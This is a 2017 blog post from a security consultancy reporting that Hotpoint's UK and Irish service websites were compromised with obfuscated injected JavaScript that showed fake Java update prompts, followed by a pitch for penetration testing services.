Computer Security Technology Ltd

+44 (0)20 7621 7836 LinkedInTwitter

+44 (0)20 7621 7836 CSTL LinkedInCSTL Twitter

May 4, 2017

Hotpoint’s UK service websites were hacked over the Easter weekend.

Fake Java update dialogs started appearing on the company’s sites. Clicking on these links took the visitors to a payload of malware.

The hacker has accomplished this feat by appending malicious JavaScript code to several of the scripts hosted on the Hotpoint service site. It was not readily apparent how the hacker gained write-access to these files, but the WordPress content management system that the site runs on is notorious for being compromised if both it and its plugins are not kept up to date.

The hack has also affected Hotpoint's Irish service website, which is hosted on the same IP address as the UK one.

The appended code is obfuscated to make its purpose less apparent, perhaps in the hope that nobody would dare to delete it. De-obfuscating the code reveals that it is responsible for loading a larger obfuscated script from an external site.

Presumably, this external site is operated by the hacker, in which case he has the opportunity to change the content of his malicious payload at will. Any visitor to the Hotpoint service site could consequently be at risk of much more serious attacks, such as drive-by malware or phishing.

Many bank holiday shoppers who buy Hotpoint white goods are likely to fall victim to this attack, as the paperwork included with new appliances directs new customers to the site to activate their 10 year parts guarantee.

Existing customers desperate to find out about certain models of dangerous tumble dryers are also likely to be snared by the JavaScript attack.

Generally, the Easter bank holiday weekend is a good time for hackers to strike UK websites, as many people will be on holiday on both Good Friday and the following Monday. The longer the attacker can keep his redirection code in place, the more revenue he can reap.

Of course, there could be wider-reaching repercussions to this attack – if an attacker has been able to modify scripts on Hotpoint's website, then he could also have been in a position to view any data stored or transmitted by the site.

How can Pen testing prevent vulnerabilities?

One of the key steps to measure operational risk is the need to understand where you are vulnerable to an attack, and where you may have already been compromised.

Penetration (Pen) Testing is a specialised discipline that encompasses a lot more than simply running a Vulnerability Assessment (VA) tool. Pen tests should follow formal procedures, use a multitude of scan tools and more importantly be undertaken by experienced engineers who can interpret the Vulnerability Assessment results to create stronger cascading attack scenarios. The test should also be undertaken by staff independent of any other function to ensure the tester provide objective and impartial reports. CST can help with this approach.

You can read the original story here.